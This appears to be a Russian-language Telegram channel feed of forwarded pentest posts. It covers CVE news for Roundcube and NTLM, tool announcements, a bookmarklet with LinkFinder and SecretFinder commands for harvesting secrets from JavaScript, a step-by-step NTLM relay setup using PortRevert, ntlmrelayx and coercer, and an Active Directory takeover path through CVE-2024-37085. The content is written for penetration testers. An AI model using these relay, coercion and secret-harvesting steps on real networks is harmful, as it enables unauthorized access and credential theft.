Forwarded from 1N73LL1G3NC3
🐕 MSSQLHound
PowerShell collector for adding MSSQL attack paths to BloodHound with OpenGraph.
Blog: BloodHound v8: Usability, Extensibility, and OpenGraph
PowerShell collector for adding MSSQL attack paths to BloodHound with OpenGraph.
Blog: BloodHound v8: Usability, Extensibility, and OpenGraph
👍1
Forwarded from Заметки склерозного вебера (ArroizX)
WordPress CheatSheet.md
8.8 KB
Встретил на проекте WordPress, который уже забыл как тестить. Пришлось заново собирать все заметки по нему с разных концов интернета=)
Поэтому чтобы больше таким не заниматься, решил сделать удобный CheatSheet со всем необходимым.
P.S. Да, пока такой мини полезный говнопостик, в августе закину вам афигенную штучку, которая будет полезна для white box тестирования;)
Поэтому чтобы больше таким не заниматься, решил сделать удобный CheatSheet со всем необходимым.
P.S. Да, пока такой мини полезный говнопостик, в августе закину вам афигенную штучку, которая будет полезна для white box тестирования;)
Forwarded from AP Security
#pentest #cve
CVE-2025-49113 - Roundcube Remote Code Execution
Эксперты предупреждают, что хакеры начинают эксплуатировать свежую уязвимость (CVE-2025-49113) в опенсорсном почтовом клиенте Roundcube Webmail. Проблема позволяет удаленно выполнить произвольный код.
Уязвимость присутствует в коде Roundcube Webmail более десяти лет и затрагивает версии с 1.1.0 по 1.6.10. Исправление для этой ошибки было выпущено 1 июня 2025 года.
Злоумышленникам потребовалась всего пара дней, чтобы отреверсить это исправление и начать продавать рабочий эксплоит для CVE-2025-49113, который теперь замечен как минимум на одном хакерском форуме.
Roundcube является одним из наиболее популярных решений для работы с веб-почтой, и его предлагают своим клиентам такие известные хостинг-провайдеры, как GoDaddy, Hostinger, Dreamhost и OVH.
С proof-of-concept можно ознакомиться по следующей ссылке.
CVE-2025-49113 - Roundcube Remote Code Execution
Эксперты предупреждают, что хакеры начинают эксплуатировать свежую уязвимость (CVE-2025-49113) в опенсорсном почтовом клиенте Roundcube Webmail. Проблема позволяет удаленно выполнить произвольный код.
Уязвимость присутствует в коде Roundcube Webmail более десяти лет и затрагивает версии с 1.1.0 по 1.6.10. Исправление для этой ошибки было выпущено 1 июня 2025 года.
Злоумышленникам потребовалась всего пара дней, чтобы отреверсить это исправление и начать продавать рабочий эксплоит для CVE-2025-49113, который теперь замечен как минимум на одном хакерском форуме.
Roundcube является одним из наиболее популярных решений для работы с веб-почтой, и его предлагают своим клиентам такие известные хостинг-провайдеры, как GoDaddy, Hostinger, Dreamhost и OVH.
С proof-of-concept можно ознакомиться по следующей ссылке.
XAKEP
В продаже появился эксплоит для критической уязвимости в Roundcube
Эксперты предупреждают, что хакеры начинают эксплуатировать свежую уязвимость (CVE-2025-49113) в опенсорсном почтовом клиенте Roundcube Webmail. Проблема позволяет удаленно выполнить произвольный код.
👍2
Forwarded from cKure
■■■■■ #️⃣ hashcat v7.0.0 released!
https://hashcat.net/forum/thread-13330.html
After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had.https://hashcat.net/forum/thread-13330.html
Please open Telegram to view this post
VIEW IN TELEGRAM
Pentester's Backlog
Something's coming 😊
А поооооооомните было такое сообщение?
Ну так вот, рад объявить о том, что канал стал официальным медиа-партнёром надвигающегося ZeroNights 2025!
Надеюсь, смогу выбраться в Питер на ивент!
Ну так вот, рад объявить о том, что канал стал официальным медиа-партнёром надвигающегося ZeroNights 2025!
Надеюсь, смогу выбраться в Питер на ивент!
🔥5
🌃 ZeroNights 2025 открывает прием заявок на доклады!
Та самая конференция по информационной безопасности ZeroNights анонсирует CFP!!!
👀 Мне ещё не доводилось побывать на этом мероприятии, но отовсюду слышу исключительно положительный фидбек о предыдущих конфах :). В этом году они снова в строю и у каждого из вас есть возможность выступить на сцене: поделиться исследованиями и инсайдами в нашей любимой сфере, обменяться опытом и просто отлично провести время.
Набирают доклады Offensive и AppSec/SecOps направленности, за эксклюзивы даже поддержат денежкой!💵
Узнать подробности и подать заявку можно на сайте конференции.
Та самая конференция по информационной безопасности ZeroNights анонсирует CFP!!!
Набирают доклады Offensive и AppSec/SecOps направленности, за эксклюзивы даже поддержат денежкой!
Узнать подробности и подать заявку можно на сайте конференции.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5🔥2
Forwarded from PurpleBear (Vadim Shelest)
Всем привет! В одном канале по BugBounty подсмотрел прикольную технику как собирать все
📌 Создаем следующую закладку в любимом браузере:
j
Раньше это приходилось делать в
📌 Скармливаем список LinkFinder, чтобы достать все ручки из
📌 Скармливаем список SecretFinder, чтобы поискать секреты (API ключи, Аccess tokens и пр)
Только в список дефолтных регулярок лучше добавить релевантные для проекта, но тут справится любая LLM😎
💡 Валидируем полученные секреты и репортим баги
💸 Вы великолепны!
JavaScript файлы без лишних движений с любой страницы, которой хочу поделиться в этой небольшой заметке.📌 Создаем следующую закладку в любимом браузере:
j
avascript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javascript_urls.txt';a.click();})();
📌 Жмакаем на закладку и сохраняем все url c js в txt c помощью JavaScript Blob Objects фичи в HTML5Раньше это приходилось делать в
Burp выбирая и сохраняя через Save selected items📌 Скармливаем список LinkFinder, чтобы достать все ручки из
JavaScript файловpython3 linkfinder.py -i javascript_urls.txt -r -o js_links.htmlLinkFinder умеет сам доставать со всего домена, но так получается найти больше эндпоинтов📌 Скармливаем список SecretFinder, чтобы поискать секреты (API ключи, Аccess tokens и пр)
python3 SecretFinder.py -i js_files/* -o js_secrets.htmlТолько в список дефолтных регулярок лучше добавить релевантные для проекта, но тут справится любая LLM😎
💡 Валидируем полученные секреты и репортим баги
💸 Вы великолепны!
Telegram
Bug Bounty
🕵️♂️ Bug Bounty Tip - Extract JavaScript File URLs from Any Page!
Forget opening DevTools - use this bookmarklet to instantly extract all .js file URLs and download them in a .txt file.
🚀 Why this matters:
Quickly collect all linked JavaScript files
Use…
Forget opening DevTools - use this bookmarklet to instantly extract all .js file URLs and download them in a .txt file.
🚀 Why this matters:
Quickly collect all linked JavaScript files
Use…
Forwarded from 1N73LL1G3NC3
Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)
CVE-2025-50154 allows an attacker to extract NTLM hashes without any user interaction, even on fully patched systems. By exploiting a subtle gap left in the mitigation, an attacker can trigger NTLM authentication requests automatically, enabling offline cracking or relay attacks to gain unauthorized access.
CVE-2025-50154 allows an attacker to extract NTLM hashes without any user interaction, even on fully patched systems. By exploiting a subtle gap left in the mitigation, an attacker can trigger NTLM authentication requests automatically, enabling offline cracking or relay attacks to gain unauthorized access.
❤2
Forwarded from Похек
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
➡️ Возможности
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
➡️ Использование
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
2. Запустите ntlmrelayx на порту 4445:
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
➡️ Как это работает
💻 Github repo
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
PortRevert.exe
2. Запустите ntlmrelayx на порту 4445:
ntlmrelayx.exe -smb-port 4445 -smb2support -debug
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue
(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)
Жертва -> Порт 445
↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
↓ (ответы)
ntlmrelayx -> Порт 4445
↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from Proxy Bar
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯2
- Больше 1кк выплат на двух (standoff / bi.zone) платформах
- 24 принятых отчёта
- 67-е место в рейтинге bi.zone
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍2
Forwarded from RedTeam brazzers (Pavel Shlundin)
Что, если ваш пользователь имеет GenericALL на пустую OU? Первым делом в голову приходит нашумевший в Июле dMSA. Но что, если нет DC под управлением WinSrv2025? Кроме обычного вектора по добалению пользователя или компьютера ничего не приходит в голову? А что если я скажу, что в некоторых случаях одно лишь это право может позволить вам взять администратора домена?
Давайте сделаем допущение, что чаще всего компрометация гипервизора влечет за собой компрометацию контроллера домена, т.к. под контроллеры домена редко держат "железные" сервера и очень часто разворачивают DC на гипервизоре. В прошлом году очень незаметно мимо всех нас прошла CVE-2024-37085. Оказывается, если в домене нет группы "ESX Admins" (она автоматически не создаётся), то злоумышленник может создать её сам и таким образом стать администратором домена в один шаг.
Получается очень интересный вектор: у вас есть непривилегированная УЗ, но она имеет GenericAll на пустую OU - создаём в этой OU, например, с помощью ldap_shell, группу ESX Admins, добавляем туда своего пользователя и компрометируем домен через гипервизор.
Давайте сделаем допущение, что чаще всего компрометация гипервизора влечет за собой компрометацию контроллера домена, т.к. под контроллеры домена редко держат "железные" сервера и очень часто разворачивают DC на гипервизоре. В прошлом году очень незаметно мимо всех нас прошла CVE-2024-37085. Оказывается, если в домене нет группы "ESX Admins" (она автоматически не создаётся), то злоумышленник может создать её сам и таким образом стать администратором домена в один шаг.
Получается очень интересный вектор: у вас есть непривилегированная УЗ, но она имеет GenericAll на пустую OU - создаём в этой OU, например, с помощью ldap_shell, группу ESX Admins, добавляем туда своего пользователя и компрометируем домен через гипервизор.